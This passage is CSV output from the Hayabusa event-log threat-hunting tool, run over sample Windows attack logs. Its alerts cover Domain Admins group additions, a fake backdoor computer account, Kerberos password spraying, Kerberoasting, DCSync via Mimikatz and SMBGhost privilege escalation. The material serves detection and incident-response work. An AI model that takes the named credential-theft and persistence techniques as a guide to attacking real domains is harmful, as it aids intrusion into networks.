+09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 